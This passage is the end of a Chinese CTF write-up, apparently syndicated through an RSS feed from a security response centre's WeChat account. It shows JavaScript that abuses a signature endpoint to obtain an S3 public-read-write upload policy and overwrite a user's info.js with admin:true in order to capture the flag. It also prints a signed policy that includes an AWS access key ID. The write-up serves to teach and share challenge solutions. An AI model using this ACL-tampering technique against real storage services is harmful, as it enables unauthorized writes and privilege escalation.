0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">public-read-write</code>、<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">public-read</code>和<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">private</code></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.65390625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=8ec87e01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGTZFIu68hJzZOqlkDLf2NCH2ZY6ibIRTBTiaeWrQ8zj18EQWMuicI01b4Q%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">signature.php</code>会根据<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">&#39;<a href="https://starbucket.s3.us-east-2.amazonaws.com/userinfo/" target="_blank">https://starbucket.s3.us-east-2.amazonaws.com/userinfo/</a>&#39; + userid + &#39;/info.js&#39;</code>中的值来判断是否加载flag，所以需要通过改<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">acl</code>参数为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">public-read-write</code>，同时上传<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">info.js</code>覆写内容为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">{&#34;admin&#34;:true,&#34;avatar&#34;:&#34;image\/default.jpg&#34;}</code>，在下一次请求时即可通过权限校验拿到flag</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(106, 115, 125);">/*</span><br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);">signature.php?acl=public-read&amp;key=image/</span><br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);"></span><br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);">{&#34;acl&#34;:&#34;public-read&#34;,&#34;key&#34;:&#34;image\/&#34;,&#34;X-Amz-Credential&#34;:&#34;AKIAI5OBRAEU3S5TMWHA\/20200514\/us-east-2\/s3\/aws4_request&#34;,&#34;X-Amz-Algorithm&#34;:&#34;AWS4-HMAC-SHA256&#34;,&#34;X-Amz-Date&#34;:&#34;20200514T070533Z&#34;,&#34;Policy&#34;:&#34;eyJleHBpcmF0aW9uIjoiMjAyMC0wNS0xNFQwODowNTozM1oiLCJjb25kaXRpb25zIjpbeyJhY2wiOiJwdWJsaWMtcmVhZCJ9LHsiYnVja2V0Ijoic3RhcmJ1Y2tldCJ9LHsia2V5IjoiaW1hZ2VcLyJ9LHsiWC1BbXotRGF0ZSI6IjIwMjAwNTE0VDA3MDUzM1oifSx7IlgtQW16LUNyZWRlbnRpYWwiOiJBS0lBSTVPQlJBRVUzUzVUTVdIQVwvMjAyMDA1MTRcL3VzLWVhc3QtMlwvczNcL2F3czRfcmVxdWVzdCJ9LHsiWC1BbXotQWxnb3JpdGhtIjoiQVdTNC1ITUFDLVNIQTI1NiJ9XX0=&#34;,&#34;X-Amz-Signature&#34;:&#34;9e2e29e94e20253bdb6e6d4ab9b0e4af2ac1237782147a44cf3d72dbde2100b9&#34;}</span><br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);">*/</span><br/><span style="box-sizing: border-box;color: rgb(111, 66, 193);">fetch</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39;./signature.php?acl=public-read-write&amp;key=userinfo/&#39;</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">+</span> <span style="box-sizing: border-box;">userid</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">+</span> <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39;/info.js&#39;</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;color: rgb(111, 66, 193);">then</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;">res</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=&gt;</span> <span style="box-sizing: border-box;">res</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;color: rgb(111, 66, 193);">json</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;color: rgb(111, 66, 193);">then</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;">json</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=&gt;</span> <span style="box-sizing: border-box;">{</span><br/>            <span style="box-sizing: border-box;color: rgb(215, 58, 73);">for</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(215, 58, 73);">let</span> <span style="box-sizing: border-box;">key</span> <span style="box-sizing: border-box;color: rgb(215, 58, 73);">in</span> <span style="box-sizing: border-box;">json</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">{</span> <br/>                <span style="box-sizing: border-box;color: rgb(111, 66, 193);">$</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39;input[name=&#39;</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">+</span><span style="box-sizing: border-box;">key</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">+</span><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39;]&#39;</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">[</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">0</span><span style="box-sizing: border-box;">]</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">value</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;">json</span><span style="box-sizing: border-box;">[</span><span style="box-sizing: border-box;">key</span><span style="box-sizing: border-box;">]</span><span style="box-sizing: border-box;">;</span><br/>            <span style="box-sizing: border-box;">}</span><br/><span style="box-sizing: border-box;">}</span><span style="box-sizing: border-box;">)</span></pre><hr style="border-style: solid;border-width: 1px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);"/><p><br/></p><h2 style="margin-top: 24px;margin-bottom: 16px;padding-bottom: 0.3em;font-weight: 600;font-size: 1.5em;white-space: normal;box-sizing: border-box;line-height: 1.25;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;background-color: rgb(255, 255, 255);">完结撒花</h2><p>文中部分思路来源于Venom战队的师傅，在此表示感谢</p><p><br/></p><p>最后悄悄地剧透一下，XMSRC近期即将发布新的挖洞翻倍活动哦，希望大家多多支持鸭</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">喜马拉雅安全应急响应中心：https:<span class="code-snippet__comment">//security.ximalaya.com</span></span></code></pre></section>



<p><a href="https://github.com/hosch3n/expload">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=68c7a4ed&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483687%26idx%3D1%26sn%3D7982d28f49700ddb9247fafa28547089%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 26 May 2020 17:39:00 +0800</pubDate>
    </item>
  </channel>
</rss>